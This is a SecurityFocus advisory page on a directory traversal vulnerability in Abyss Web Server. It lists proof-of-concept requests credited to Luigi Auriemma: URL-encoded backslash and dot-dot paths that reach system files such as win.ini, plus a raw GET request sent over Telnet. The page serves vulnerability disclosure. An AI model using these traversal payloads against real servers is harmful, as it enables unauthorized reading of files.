Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Abyss Web Server Encoded Backslash Directory Traversal Vulnerability

The following proof of concepts were provided by Auriemma Luigi <aluigi@pivx.com>:

http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0" (using a Telnet client)
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/
http://host/%2f%2e%2e%2f
http://host/%2f%2e%2e%2fcgi-bin/







 

Privacy Statement
Copyright 2009, SecurityFocus